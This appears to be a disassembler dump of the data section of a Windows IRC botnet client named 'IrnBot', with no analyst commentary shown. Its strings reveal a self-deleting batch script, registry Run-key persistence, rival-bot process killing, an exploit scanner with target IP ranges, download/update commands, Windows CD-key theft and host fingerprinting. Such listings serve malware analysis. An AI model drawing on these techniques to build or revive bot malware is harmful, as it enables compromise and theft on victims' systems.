asc_4213EC	db 0Dh,0Ah,0		; DATA XREF: sub_418B81+CBo
		align 10h
aSSS_1		db '%s %s %s',0Dh,0Ah,0 ; DATA XREF: sub_417FE1+C2o
		align 4
aS_13		db '%s',0               ; DATA XREF: sub_4184BD+4Ao
		align 10h
asc_421400	db ' :',0               ; DATA XREF: sub_4184BD+7Eo
		align 4
aS_14		db '%s',0               ; DATA XREF: sub_4184BD+8Ao
		align 4
asc_421408:				; DATA XREF: sub_4184BD+E1o
		unicode	0, < >,0
aS_15		db '%s',0               ; DATA XREF: sub_4184BD+FAo
		align 10h
asc_421410:				; DATA XREF: sub_4184BD+124o
		unicode	0, < >,0
aSS_10		db '%s %s',0Dh,0Ah,0    ; DATA XREF: sub_4184BD+24Ao
aSSS_2		db '%s %s %s',0Dh,0Ah,0 ; DATA XREF: sub_4184BD+31Eo
		align 4
a001		db '001',0              ; DATA XREF: sub_4184BD+33Ao
aSSSSSS		db '%s %s %s',0Dh,0Ah   ; DATA XREF: sub_4184BD+3D3o
		db '%s %s %s',0Dh,0Ah,0
		align 4
a332		db '332',0              ; DATA XREF: sub_4184BD+417o
asc_421448	db ' :',0               ; DATA XREF: sub_4184BD+499o
		align 4
aS_1		db '%s',0               ; DATA XREF: sub_4184BD+4A5o
		align 10h
asc_421450:				; DATA XREF: sub_4184BD+4D9o
		unicode	0, <!>,0
aS_2		db '%s',0               ; DATA XREF: sub_4184BD+4E5o
		align 4
a332_0		db '332',0              ; DATA XREF: sub_4184BD+52Do
aS_3		db '%s',0               ; DATA XREF: sub_4184BD+546o
		align 10h
aS_4		db '%s',0               ; DATA XREF: sub_4184BD+5B1o
		align 4
aS_5		db '%s',0               ; DATA XREF: sub_4184BD+5DFo
		align 4
asc_421468:				; DATA XREF: sub_4184BD+64Eo
		unicode	0, <;>,0
asc_42146C:				; DATA XREF: sub_4184BD:loc_418B12o
		unicode	0, <;>,0
asc_421470:				; DATA XREF: sub_4184BD:loc_418B1Fo
		unicode	0, <;>,0
asc_421474:				; DATA XREF: sub_4182F6+Co
		unicode	0, < >,0
aS_9		db '-s',0               ; DATA XREF: sub_4182F6+27o
		align 4
aS_10		db '/s',0               ; DATA XREF: sub_4182F6+3Fo
		align 10h
asc_421480:				; DATA XREF: sub_4182F6:loc_41834Ao
		unicode	0, < >,0
aQwertyuiopasdf	db 'qwertyuiopasdfghjklzxcvbnmQWERTYUIOPLKJHGFDSAZXCVBNM',0
					; DATA XREF: sub_41810B+21o
		align 4
asc_4214BC:				; DATA XREF: sub_41810B+5Eo
		unicode	0, <[>,0
aSS		db '%s%s|',0            ; DATA XREF: sub_41810B+95o
		align 4
aSS_0		db '%s%s|',0            ; DATA XREF: sub_41810B+C5o
		align 10h
aSp		db '%sP|',0             ; DATA XREF: sub_41810B+F0o
		align 4
aS0I64u		db '%s0%I64u|',0        ; DATA XREF: sub_41810B+12Fo
		align 4
aSI64u		db '%s%I64u|',0         ; DATA XREF: sub_41810B+150o
		align 10h
aSC		db '%s%c',0             ; DATA XREF: sub_41810B+18Fo
		align 4
aS_0		db '%s]',0              ; DATA XREF: sub_41810B+1BAo
aBadAllocati_14	db 'bad allocation',0   ; DATA XREF: .data:00427868o
		align 4
aHs		db 'HS',0               ; DATA XREF: sub_419997+28o
		align 10h
aIrnbot		db 'IrnBot',0           ; DATA XREF: sub_4198C0+89o
		align 4
aSS_1		db '%s\%s',0            ; DATA XREF: sub_41979F+4Eo
		align 10h
aGet		db 'GET',0              ; DATA XREF: sub_4191D2+B7o
aQue?		db 'Que?',0             ; DATA XREF: sub_4191D2+C7o
		align 10h
aHttp1_1501NotI	db 'HTTP/1.1 501 Not Implemented',0Dh,0Ah ; DATA XREF: sub_4191D2+10Fo
		db 'Content-Length: %d',0Dh,0Ah
		db 'Connection: close',0Dh,0Ah
		db 0Dh,0Ah,0
aSSSS		db '%s\%s\%s%s',0       ; DATA XREF: sub_4191D2+229o
		align 4
aSSS		db '%s\%s\%s',0         ; DATA XREF: sub_4191D2+1F2o
		align 10h
aSS_4		db '%s\%s',0            ; DATA XREF: sub_4191D2+25Ao
		align 4
aQue?_0		db 'Que?',0             ; DATA XREF: sub_4191D2+3A8o
		align 10h
aQue?_1		db 'Que?',0             ; DATA XREF: sub_4191D2+2BEo
		align 4
aHttp1_1200OkCo	db 'HTTP/1.1 200 ok',0Dh,0Ah ; DATA XREF: sub_4191D2+3FCo
		db 'Content-Length: %d',0Dh,0Ah
		db 'Connection: close',0Dh,0Ah
		db 0Dh,0Ah,0
		align 4
aHttpTransferD_	db 'HTTP: Transfer: %d.%d.%d.%d (N/A). %d Total Sends.',0
					; DATA XREF: sub_4191D2+51Do
		align 4
aHttpTransfer_0	db 'HTTP: Transfer: %d.%d.%d.%d (%s). %d Total Sends.',0
					; DATA XREF: sub_4191D2+54Ao
		align 4
asc_42164C	db 0Dh,0Ah,0		; DATA XREF: sub_41913F+11o
		align 10h
asc_421650:				; DATA XREF: sub_41913F:loc_41916Bo
		unicode	0, < >,0
asc_421654:				; DATA XREF: sub_41913F+3Do
		unicode	0, < >,0
asc_421658:				; DATA XREF: sub_41913F+54o
		unicode	0, < >,0
asc_42165C	db 0Dh,0Ah		; DATA XREF: sub_41913F+78o
		db 0Dh,0Ah,0
		align 4
asc_421664	db '%x',0               ; DATA XREF: sub_419016+CAo
		align 4
aBadAllocati_15	db 'bad allocation',0
		align 4
aS_16		db '%s',0               ; DATA XREF: sub_41C1B3+74o
		align 4
aSX		db '%s%X',0             ; DATA XREF: sub_41C1B3+ECo
		align 4
aBadAllocati_16	db 'bad allocation',0
		align 4
a@echoOff1DelSI	db '@echo off',0Dh,0Ah  ; DATA XREF: sub_419D3D+7Eo
		db ':1',0Dh,0Ah
		db 'del "%s"',0Dh,0Ah
		db 'if exist "%s" goto 1',0Dh,0Ah
		db 'del "%%0"',0Dh,0Ah,0
		align 10h
aSTmpIIICCC_bat	db '%s\tmp-%i%i%i-%c%c%c.bat',0 ; DATA XREF: sub_419D3D+FCo
		align 4
aW:					; DATA XREF: sub_419D3D+110o
		unicode	0, <w>,0
aS_7		db '%s',0               ; DATA XREF: sub_419D3D+12Bo
		align 4
aRegistryMonito	db 'Registry Monitor',0 ; DATA XREF: sub_41A0E3+D9o
		align 4
aSoftwareMicr_4	db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',0
					; DATA XREF: sub_41A0E3+12Ao
		align 4
aQuitSYouKill_0	db 'QUIT :%s YOU KILLED ME :<',0Dh,0Ah,0
aQuitSYouKilled	db 'QUIT :%s YOU KILLED ME :< --UPDATED',0Dh,0Ah,0
					; DATA XREF: sub_41A0E3+15Ao
		align 4
aRemoveAuthenti	db 'Remove: Authentication Failed.',0
		align 4
aD_D_D_D_0	db '%d.%d.%d.%d',0      ; DATA XREF: sub_419C46+4Eo
aVis		db 'VIS',0              ; DATA XREF: sub_419AD1+42o
a2k3		db '2K3',0              ; DATA XREF: sub_419AD1+55o
aXp_0		db 'XP',0               ; DATA XREF: sub_419AD1+62o
		align 4
a2k		db '2K',0               ; DATA XREF: sub_419AD1+6Eo
		align 4
aMe		db 'ME',0               ; DATA XREF: sub_419AD1+81o
		align 4
a98		db '98',0               ; DATA XREF: sub_419AD1+8Eo
		align 10h
aNt		db 'NT',0               ; DATA XREF: sub_419AD1+A0o
		align 4
a95		db '95',0               ; DATA XREF: sub_419AD1+ADo
		align 4
aUnk		db 'UNK',0              ; DATA XREF: sub_419AD1:loc_419B85o
aOsMicrosoftWin	db '[OS: Microsoft Windows %s %s (%i.%i build %i)]',0
					; DATA XREF: sub_419AD1+108o
		align 4
aS_6		db '%s',0               ; DATA XREF: sub_419AD1+13Ao
		align 10h
a192_168__	db '192.168.*.*',0      ; DATA XREF: sub_419FC7+32o
a10___		db '10.*.*.*',0         ; DATA XREF: sub_419FC7+46o
		align 4
a111___		db '111.*.*.*',0        ; DATA XREF: sub_419FC7+5Ao
		align 4
a15___		db '15.*.*.*',0         ; DATA XREF: sub_419FC7+6Eo
		align 10h
a16___		db '16.*.*.*',0         ; DATA XREF: sub_419FC7+82o
		align 4
a101___		db '101.*.*.*',0        ; DATA XREF: sub_419FC7+92o
		align 4
a110___		db '110.*.*.*',0        ; DATA XREF: sub_419FC7+A2o
		align 4
a112___		db '112.*.*.*',0        ; DATA XREF: sub_419FC7+B2o
		align 10h
a172_D__	db '172.%d.*.*',0       ; DATA XREF: sub_419FC7+CCo
		align 4
aBadAllocati_17	db 'bad allocation',0
		align 4
aBadAllocati_18	db 'bad allocation',0
		align 4
aMessageboxa_0	db 'MessageBoxA',0      ; DATA XREF: sub_41A2E3+12o
aUser32_dll	db 'user32.dll',0       ; DATA XREF: sub_41A2E3+17o
		align 4
dword_4218A4	dd 0D010Fh, 0C3000000h,	0 ; DATA XREF: sub_41A258+19o
		dd 20646162h, 6F6C6C61h, 69746163h, 6E6Fh, 20646162h, 6F6C6C61h
		dd 69746163h, 6E6Fh
dword_4218D0	dd 63257325h, 0		; DATA XREF: sub_41A33D+55o
		dd 20646162h, 6F6C6C61h, 69746163h, 6E6Fh
dword_4218E8	dd 6C6E6977h, 6E6F676Fh, 6578652Eh, 0 ;	DATA XREF: sub_41AB0C+3Co
dword_4218F8	dd 68637673h, 2E74736Fh, 657865h ; DATA	XREF: sub_41AB0C+44o
dword_421904	dd 76726573h, 73656369h, 6578652Eh, 0 ;	DATA XREF: sub_41AB0C+4Co
aOpenthread	db 'OpenThread',0       ; DATA XREF: sub_41AB0C+5Fo
		align 10h
aKernel32_dll_0	db 'kernel32.dll',0     ; DATA XREF: sub_41AB0C+64o
		align 10h
aOpenprocess	db 'OpenProcess',0      ; DATA XREF: sub_41AB0C+78o
aKernel32_dll_1	db 'kernel32.dll',0     ; DATA XREF: sub_41AB0C+7Do
		align 4
aCreatetoolhelp	db 'CreateToolhelp32Snapshot',0 ; DATA XREF: sub_41AB0C+8Co
		align 4
aKernel32_dll_2	db 'kernel32.dll',0     ; DATA XREF: sub_41AB0C+91o
		align 4
aProcess32first	db 'Process32First',0   ; DATA XREF: sub_41AB0C+A0o
		align 4
aKernel32_dll_3	db 'kernel32.dll',0     ; DATA XREF: sub_41AB0C+A5o
		align 4
aProcess32next	db 'Process32Next',0    ; DATA XREF: sub_41AB0C+B4o
		align 4
aKernel32_dll_4	db 'kernel32.dll',0     ; DATA XREF: sub_41AB0C+B9o
		align 4
aModule32first	db 'Module32First',0    ; DATA XREF: sub_41AB0C+C8o
		align 4
aKernel32_dll_5	db 'kernel32.dll',0     ; DATA XREF: sub_41AB0C+CDo
		align 4
aModule32next	db 'Module32Next',0     ; DATA XREF: sub_41AB0C+DCo
		align 4
aKernel32_dll_6	db 'kernel32.dll',0     ; DATA XREF: sub_41AB0C+E1o
		align 4
aThread32first	db 'Thread32First',0    ; DATA XREF: sub_41AB0C+F0o
		align 4
aKernel32_dll_7	db 'kernel32.dll',0     ; DATA XREF: sub_41AB0C+F5o
		align 4
aThread32next	db 'Thread32Next',0     ; DATA XREF: sub_41AB0C+104o
		align 4
aKernel32_dll_8	db 'kernel32.dll',0     ; DATA XREF: sub_41AB0C+109o
		align 4
aReadprocessmem	db 'ReadProcessMemory',0 ; DATA XREF: sub_41AB0C+118o
		align 4
aKernel32_dll_9	db 'kernel32.dll',0     ; DATA XREF: sub_41AB0C+11Do
		align 4
aGetmodulefilen	db 'GetModuleFileNameExA',0 ; DATA XREF: sub_41AB0C+12Co
		align 4
aPsapi_dll	db 'psapi.dll',0        ; DATA XREF: sub_41AB0C+131o
		align 10h
aSS_2		db '%s\%s',0            ; DATA XREF: sub_41AB0C+1F5o
		align 4
aSedebugprivile	db 'SeDebugPrivilege',0 ; DATA XREF: sub_41AB0C+2BEo
		align 4
aSedebugprivi_0	db 'SeDebugPrivilege',0 ; DATA XREF: sub_41AB0C+365o
		align 10h
aSystem		db 'System',0           ; DATA XREF: sub_41AB0C+390o
		align 4
aBotKilledS	db 'Bot Killed: %s',0   ; DATA XREF: sub_41AB0C+451o
		align 4
aSoftwareMicr_5	db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',0
					; DATA XREF: sub_41A70B+36o
		align 4
aSoftwareMicr_6	db 'SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce',0
					; DATA XREF: sub_41A70B+3Do
		align 4
aSoftwareMicr_7	db 'SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx',0
					; DATA XREF: sub_41A70B+44o
aSoftwareMicr_8	db 'SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices',0
					; DATA XREF: sub_41A70B+4Bo
		align 4
aSystemControls	db 'SYSTEM\ControlSet001\Services\Eventlog\System',0
					; DATA XREF: sub_41A8D9+26o
		align 4
aSS_5		db '%s\%s',0            ; DATA XREF: sub_41A8D9+E4o
		align 10h
aLdm		db 'LDM',0              ; DATA XREF: sub_41A8D9+118o
aNetdde		db 'NetDDE',0           ; DATA XREF: sub_41A8D9+12Bo
		align 4
aEventmessagefi	db 'EventMessageFile',0 ; DATA XREF: sub_41A8D9+142o
		align 10h
aBadAllocati_19	db 'bad allocation',0
		align 10h
aListTTooLong	db 'list<T> too long',0 ; DATA XREF: sub_40121E+2Bo
					; sub_4016BA+2Bo
		align 4
		dd offset dword_422188
off_421C18	dd offset nullsub_24	; DATA XREF: sub_41C75B+23o
dword_421C1C	dd 7325h		; DATA XREF: sub_40177B+EBo
					; sub_4019F3+EBo ...
dword_421C20	dd 652Dh		; DATA XREF: sub_40177B+1D5o
dword_421C24	dd 31h			; DATA XREF: sub_40177B+1E7o
dword_421C28	dd 4C44h		; DATA XREF: sub_40177B+23Fo
					; sub_4019F3+1F1o
aDlAuthFailure_	db 'DL: Auth Failure.',0 ; DATA XREF: sub_40177B:loc_4019C8o
		align 10h
aDlInvalidArgum	db 'DL: Invalid Arguments',0 ; DATA XREF: sub_40177B:loc_4019D5o
		align 4
aUpdAuthFailure	db 'UPD: Auth Failure.',0 ; DATA XREF: sub_4019F3:loc_401BF2o
		align 4
aUpdInvalidArgu	db 'UPD: Invalid Arguments.',0 ; DATA XREF: sub_4019F3:loc_401BFFo
		dd offset dword_422338
off_421C88	dd offset sub_40177B	; DATA XREF: .text:0041D025o
					; .data:off_437698o
		dd offset dword_4222EC
off_421C90	dd offset sub_4019F3	; DATA XREF: .text:0041D041o
					; .data:off_437694o
dword_421C94	dd 25207325h, 73h	; DATA XREF: sub_401C1D+8Fo
dword_421C9C	dd 54495551h, 73253A20h, 0A0Dh ; DATA XREF: sub_401C1D+BFo
aQuitIrnPowered	db 'QUIT :Irn Powered',0Dh,0Ah,0 ; DATA XREF: sub_401C1D:loc_401CF7o
aJoinSS		db 'JOIN %s %s',0Dh,0Ah,0 ; DATA XREF: sub_401D0C+1Eo
		align 4
aJoinS		db 'JOIN %s',0Dh,0Ah,0  ; DATA XREF: sub_401D0C+30o
		align 4
aIInsufficientA	db 'I: Insufficient Arguments.',0 ; DATA XREF: sub_401D0C:loc_401D4Ao
					; sub_401D67:loc_401D8Ao
		align 4
aPartS		db 'PART %s',0Dh,0Ah,0  ; DATA XREF: sub_401D67+14o
		align 10h
		dd offset dword_42241C
off_421D04	dd offset sub_401C1D	; DATA XREF: .text:0041D05Do
					; .data:off_4376A4o
		dd offset dword_4223D0
off_421D0C	dd offset sub_401D0C	; DATA XREF: .text:0041D079o
					; .data:off_43769Co
		dd offset dword_422384
off_421D14	dd offset sub_401D67	; DATA XREF: .text:0041D095o
					; .data:off_4376A0o
aSystemUptimeI6	db 'System Uptime: %I64u Days, %I64u Hours, %I64u Minutes.',0
					; DATA XREF: sub_401DA7+29o
		align 10h
aHttpSDS	db 'http://%s:%d/%s',0  ; DATA XREF: sub_401DED+77o
aWindowsCdKeyS	db 'Windows CD Key: %s',0 ; DATA XREF: sub_401E90+44o
		align 4
		dd offset dword_422500
off_421D78	dd offset sub_401DA7	; DATA XREF: .text:0041D0B1o
					; .data:off_4376A8o
		dd offset dword_4224B4
off_421D80	dd offset sub_401DED	; DATA XREF: .text:0041D0CDo
					; .data:off_4376ACo
		dd offset dword_422468
off_421D88	dd offset sub_401E90	; DATA XREF: .text:0041D0E9o
					; .data:off_4376B0o
off_421D8C	dd offset loc_443451+2	; DATA XREF: sub_401EF9+FAo
					; sub_401EF9+142o ...
aS4AlreadyRunni	db 'S4:Already Running',0 ; DATA XREF: sub_401EF9:loc_402049o
		align 4
aS4ThreadStoppe	db 'S4: Thread Stopped',0 ; DATA XREF: sub_402086+7Co
		align 4
aS4NoThreadRunn	db 'S4: No Thread Running',0 ; DATA XREF: sub_402086:loc_402109o
		align 10h
		dd offset dword_422598
off_421DD4	dd offset sub_401EF9	; DATA XREF: .text:0041D105o
					; .data:off_4376B8o
		dd offset dword_42254C
off_421DDC	dd offset sub_402086	; DATA XREF: .text:0041D121o
					; .data:off_4376B4o
aSystemSCpuIXS@	db 'System: %s [CPU: %i x %s @ %dMhz] [RAM: %iMB/%iMB] [Country: %s] '
					; DATA XREF: sub_402129+185o
		db '[IP: %s] [User: %s] [System Dir: %s] [Uptime: %I64ud %I64uh %I64u'
		db 'm]',0
		align 4
aNetIpSHostNA	db 'Net: IP: %s Host: N/A',0 ; DATA XREF: sub_4022EB+55o
		align 10h
aNetIpSHostS	db 'Net: IP: %s Host: %s',0 ; DATA XREF: sub_4022EB+73o
		align 4
		dd offset dword_422630
off_421E9C	dd offset sub_402129	; DATA XREF: .text:0041D13Do
					; .data:off_4376BCo
		dd offset dword_4225E4
off_421EA4	dd offset sub_4022EB	; DATA XREF: .text:0041D159o
					; .data:off_4376C0o
		dd 504455h, 3A504455h, 736E4920h, 69666675h, 6E656963h
		dd 72412074h, 656D7567h, 2E73746Eh, 0
		dd offset dword_42267C
off_421ED0	dd offset byte_402385	; DATA XREF: .text:0041D175o
					; .data:off_4376C4o
aScanUnknownExp	db 'Scan: Unknown Exploit.',0 ; DATA XREF: .text:loc_402589o
		align 4
a____0		db '*.*.*.*',0          ; DATA XREF: .text:004025ABo
aA_0		db '-a',0               ; DATA XREF: .text:004025EAo
		align 4
aB		db '-b',0               ; DATA XREF: .text:004025F9o
		align 4
aC		db '-c',0               ; DATA XREF: .text:00402608o
		align 10h
aScanNotEnoughT	db 'Scan: Not Enough Threads. %d Available.',0 ; DATA XREF: .text:00402652o
aD_D_D_D	db '%d.%d.%d.%d',0      ; DATA XREF: .text:004026CCo
					; .text:00402809o
aX_		db 'x.',0               ; DATA XREF: .text:004026E3o
		align 4
aD_		db '%d.',0              ; DATA XREF: .text:004026F7o
aSx_		db '%sx.',0             ; DATA XREF: .text:0040270Fo
		align 4
aSD_		db '%s%d.',0            ; DATA XREF: .text:0040270Ao
		align 4
aSx		db '%sx',0              ; DATA XREF: .text:0040276Co
aSD		db '%s%d',0             ; DATA XREF: .text:00402781o
		align 4
aD_x_x_x	db '%d.x.x.x',0         ; DATA XREF: .text:00402862o
		align 4
aD_D_x_x	db '%d.%d.x.x',0        ; DATA XREF: .text:0040284Bo
		align 10h
aD_D_D_x	db '%d.%d.%d.x',0       ; DATA XREF: .text:00402831o
		align 4
aScanSDUsingDTh	db 'Scan: %s:%d Using %d Threads.',0 ; DATA XREF: .text:004028ACo
		align 4
aScanner	db 'Scanner',0          ; DATA XREF: .text:0040298Co
					; .text:00402A04o
aScanAllScanThr	db 'Scan: All Scan Threads Stopped. %d killed.',0
					; DATA XREF: .text:00402A81o
		align 10h
aStatisticsExpl	db 'Statistics: Exploits:',0 ; DATA XREF: sub_402AA2+3Bo
		align 4
aSSD		db '%s %s: %d',0        ; DATA XREF: sub_402AA2+62o
		align 4
aSDaemons	db '%s; Daemons:',0     ; DATA XREF: sub_402AA2+84o
		align 4
aSTftpD		db '%s TFTP: %d',0      ; DATA XREF: sub_402AA2+9Ao
aSHttpD		db '%s HTTP: %d',0      ; DATA XREF: sub_402AA2+B0o
		dd offset dword_422760
off_422020	dd offset loc_4024A4	; DATA XREF: .text:0041D19Fo
					; .data:off_4376D4o
		dd offset dword_422714
; [00000003 BYTES: COLLAPSED FUNCTION nullsub_449. PRESS KEYPAD	"+" TO EXPAND]
		align 4
		dd offset dword_4226C8
off_422030	dd offset sub_402AA2	; DATA XREF: .text:0041D1D7o
					; .data:off_4376D0o
		align 8
dbl_422038	dq 5.0e-1		; DATA XREF: sub_41B423:loc_41B922r
flt_422040	dd 4.2949673e9		; DATA XREF: sub_41B423+4F9r
		align 8
		dd 48h,	0Eh dup(0)
		dd offset dword_424064
		dd offset dword_4227B0
		dd 13h
dword_422090	dd 3 dup(0)		; DATA XREF: jlrllt49:0041E354o
		dd offset off_424008
		dd offset dword_4220A4
dword_4220A4	dd 2 dup(0)		; DATA XREF: jlrllt49:004220A0o
		dd 3, 4220B4h, 4220C4h,	422250h, 42229Ch, 0
		dd offset off_424008
		dd 2, 0
		dd 0FFFFFFFFh, 0
		dd 40h,	4220A4h
dword_4220E0	dd 3 dup(0)		; DATA XREF: jlrllt49:0041E388o
		dd offset off_427C08
		dd offset dword_4222B8
dword_4220F4	dd 3 dup(0)		; DATA XREF: jlrllt49:0041E3A8o
		dd offset off_424030
		dd offset dword_422108
dword_422108	dd 2 dup(0)		; DATA XREF: jlrllt49:00422104o
		dd 1, 422118h, 422120h,	0
		dd offset off_424030
		dd 2 dup(0)
		dd 0FFFFFFFFh, 0
		dd 40h,	422108h
dword_42213C	dd 3 dup(0)		; DATA XREF: jlrllt49:0041EC40o
		dd offset off_424E50
		dd offset dword_422150
dword_422150	dd 2 dup(0)		; DATA XREF: jlrllt49:0042214Co
		dd 2, 422160h, 42216Ch,	42229Ch, 0
		dd offset off_424E50
		dd 1, 0
		dd 0FFFFFFFFh, 0
		dd 40h,	422150h
dword_422188	dd 3 dup(0)		; DATA XREF: jlrllt49:00421C14o
		dd offset off_427BB0
		dd offset dword_42219C
dword_42219C	dd 2 dup(0)		; DATA XREF: jlrllt49:00422198o
		dd 1, 4221ACh, 4221B4h,	0
		dd offset off_427BB0
		align 10h
		dd 0FFFFFFFFh, 0
		dd 40h,	42219Ch
dword_4221D0	dd 3 dup(0)		; DATA XREF: jlrllt49:0041E348o
		dd offset off_427BC8
		dd offset dword_4221E4
dword_4221E4	dd 2 dup(0)		; DATA XREF: jlrllt49:004221E0o
		dd 3, 4221F4h, 422204h,	422250h, 42229Ch, 0
		dd offset off_427BC8
		dd 2, 0
		dd 0FFFFFFFFh, 0
		dd 40h,	4221E4h
dword_422220	dd 3 dup(0)		; DATA XREF: jlrllt49:0041E33Co
		dd offset off_427BE8
		dd offset dword_422234
dword_422234	dd 2 dup(0)		; DATA XREF: jlrllt49:00422230o
		dd 2, 422244h, 422250h,	42229Ch, 0
		dd offset off_427BE8
		dd 1, 0
		dd 0FFFFFFFFh, 0
		dd 40h,	422234h, 3 dup(0)
		dd offset off_427C24
		dd offset dword_422280
dword_422280	dd 2 dup(0)		; DATA XREF: jlrllt49:0042227Co
		dd 2, 422290h, 4222D0h,	42229Ch, 0
		dd offset off_427C08
		dd 2 dup(0)
		dd 0FFFFFFFFh, 0
		dd 40h,	4222B8h
dword_4222B8	dd 2 dup(0)		; DATA XREF: jlrllt49:004220F0o
		dd 1, 4222C8h, 42229Ch,	0
		dd offset off_427C24
		dd 1, 0
		dd 0FFFFFFFFh, 0
		dd 40h,	422280h
dword_4222EC	dd 3 dup(0)		; DATA XREF: jlrllt49:00421C8Co
		dd offset off_427C40
		dd offset dword_422300
dword_422300	dd 2 dup(0)		; DATA XREF: jlrllt49:004222FCo
		dd 2, 422310h, 42231Ch,	4221B4h, 0
		dd offset off_427C40
		dd 1, 0
		dd 0FFFFFFFFh, 0
		dd 40h,	422300h
dword_422338	dd 3 dup(0)		; DATA XREF: jlrllt49:00421C84o
		dd offset off_427C58
		dd offset dword_42234C
dword_42234C	dd 2 dup(0)		; DATA XREF: jlrllt49:00422348o
		dd 2, 42235Ch, 422368h,	4221B4h, 0
		dd offset off_427C58
		dd 1, 0
		dd 0FFFFFFFFh, 0
		dd 40h,	42234Ch
dword_422384	dd 3 dup(0)		; DATA XREF: jlrllt49:00421D10o
		dd offset off_427C6C
		dd offset dword_422398
dword_422398	dd 2 dup(0)		; DATA XREF: jlrllt49:00422394o
		dd 2, 4223A8h, 4223B4h,	4221B4h, 0
		dd offset off_427C6C
		dd 1, 0
		dd 0FFFFFFFFh, 0
		dd 40h,	422398h
dword_4223D0	dd 3 dup(0)		; DATA XREF: jlrllt49:00421D08o
		dd offset off_427C84
		dd offset dword_4223E4
dword_4223E4	dd 2 dup(0)		; DATA XREF: jlrllt49:004223E0o
		dd 2, 4223F4h, 422400h,	4221B4h, 0
		dd offset off_427C84
		dd 1, 0
		dd 0FFFFFFFFh, 0
		dd 40h,	4223E4h
dword_42241C	dd 3 dup(0)		; DATA XREF: jlrllt49:00421D00o
		dd offset off_427C9C
		dd offset dword_422430
dword_422430	dd 2 dup(0)		; DATA XREF: jlrllt49:0042242Co
		dd 2, 422440h, 42244Ch,	4221B4h, 0
		dd offset off_427C9C
		dd 1, 0
		dd 0FFFFFFFFh, 0
		dd 40h,	422430h
dword_422468	dd 3 dup(0)		; DATA XREF: jlrllt49:00421D84o
		dd offset off_427CB4
		dd offset dword_42247C
dword_42247C	dd 2 dup(0)		; DATA XREF: jlrllt49:00422478o
		dd 2, 42248Ch, 422498h,	4221B4h, 0
		dd offset off_427CB4
		dd 1, 0
		dd 0FFFFFFFFh, 0
		dd 40h,	42247Ch
dword_4224B4	dd 3 dup(0)		; DATA XREF: jlrllt49:00421D7Co
		dd offset off_427CCC
		dd offset dword_4224C8
dword_4224C8	dd 2 dup(0)		; DATA XREF: jlrllt49:004224C4o
		dd 2, 4224D8h, 4224E4h,	4221B4h, 0
		dd offset off_427CCC
		dd 1, 0
		dd 0FFFFFFFFh, 0
		dd 40h,	4224C8h
dword_422500	dd 3 dup(0)		; DATA XREF: jlrllt49:00421D74o
		dd offset off_427CE8
		dd offset dword_422514
dword_422514	dd 2 dup(0)		; DATA XREF: jlrllt49:00422510o
		dd 2, 422524h, 422530h,	4221B4h, 0
		dd offset off_427CE8
		dd 1, 0
		dd 0FFFFFFFFh, 0
		dd 40h,	422514h
dword_42254C	dd 3 dup(0)		; DATA XREF: jlrllt49:00421DD8o
		dd offset off_427D00
		dd offset dword_422560
dword_422560	dd 2 dup(0)		; DATA XREF: jlrllt49:0042255Co
		dd 2, 422570h, 42257Ch,	4221B4h, 0
		dd offset off_427D00
		dd 1, 0
		dd 0FFFFFFFFh, 0
		dd 40h,	422560h
dword_422598	dd 3 dup(0)		; DATA XREF: jlrllt49:00421DD0o
		dd offset off_427D18
		dd offset dword_4225AC
dword_4225AC	dd 2 dup(0)		; DATA XREF: jlrllt49:004225A8o
		dd 2, 4225BCh, 4225C8h,	4221B4h, 0
		dd offset off_427D18
		dd 1, 0
		dd 0FFFFFFFFh, 0
		dd 40h,	4225ACh
dword_4225E4	dd 3 dup(0)		; DATA XREF: jlrllt49:00421EA0o
		dd offset off_427D2C
		dd offset dword_4225F8
dword_4225F8	dd 2 dup(0)		; DATA XREF: jlrllt49:004225F4o
		dd 2, 422608h, 422614h,	4221B4h, 0
		dd offset off_427D2C
		dd 1, 0
		dd 0FFFFFFFFh, 0
		dd 40h,	4225F8h
dword_422630	dd 3 dup(0)		; DATA XREF: jlrllt49:00421E98o
		dd offset off_427D48
		dd offset dword_422644
dword_422644	dd 2 dup(0)		; DATA XREF: jlrllt49:00422640o
		dd 2, 422654h, 422660h,	4221B4h, 0
		dd offset off_427D48
		dd 1, 0
		dd 0FFFFFFFFh, 0
		dd 40h,	422644h
dword_42267C	dd 3 dup(0)		; DATA XREF: jlrllt49:00421ECCo
		dd offset off_427D64
		dd offset dword_422690
dword_422690	dd 2 dup(0)		; DATA XREF: jlrllt49:0042268Co
		dd 2, 4226A0h, 4226ACh,	4221B4h, 0
		dd offset off_427D64
		dd 1, 0
		dd 0FFFFFFFFh, 0
		dd 40h,	422690h
dword_4226C8	dd 3 dup(0)		; DATA XREF: jlrllt49:0042202Co
		dd offset off_427D7C
		dd offset dword_4226DC
dword_4226DC	dd 2 dup(0)		; DATA XREF: jlrllt49:004226D8o
		dd 2, 4226ECh, 4226F8h,	4221B4h, 0
		dd offset off_427D7C
		dd 1, 0
		dd 0FFFFFFFFh, 0
		dd 40h,	4226DCh
dword_422714	dd 3 dup(0)		; DATA XREF: jlrllt49:00422024o
		dd offset off_427D98
		dd offset dword_422728
dword_422728	dd 2 dup(0)		; DATA XREF: jlrllt49:00422724o
		dd 2, 422738h, 422744h,	4221B4h, 0
		dd offset off_427D98
		dd 1, 0
		dd 0FFFFFFFFh, 0
		dd 40h,	422728h
dword_422760	dd 3 dup(0)		; DATA XREF: jlrllt49:0042201Co
		dd offset off_427DB4
		dd offset dword_422774
dword_422774	dd 2 dup(0)		; DATA XREF: jlrllt49:00422770o
		dd 2, 422784h, 422790h,	4221B4h, 0
		dd offset off_427DB4
		dd 1, 0
		dd 0FFFFFFFFh, 0
		dd 40h,	422774h, 0
dword_4227B0	dd 4884h, 4989h, 6C00h,	8C18h, 0F128h, 1CD93h, 1CDAEh
					; DATA XREF: jlrllt49:00422088o
		dd 1CDC9h, 1CDECh, 1CE0Fh, 1CE34h, 1CE59h, 1CE81h, 1CEB7h
		dd 1CEDCh, 1CF0Eh, 1CF43h, 1CF7Eh, 1CFB3h, 0
dword_422800	dd 2 dup(0)		; DATA XREF: sub_40B602+2o
					; sub_40B602+7o
dword_422808	dd 2 dup(0)		; DATA XREF: sub_40B626+2o
					; sub_40B626+7o
dword_422810	dd 0			; DATA XREF: sub_402C47+29o
		dd offset sub_402BDB
		dd 0
		dd offset dword_42284C
		dd 0FFFFFFFFh, 41CD8Bh
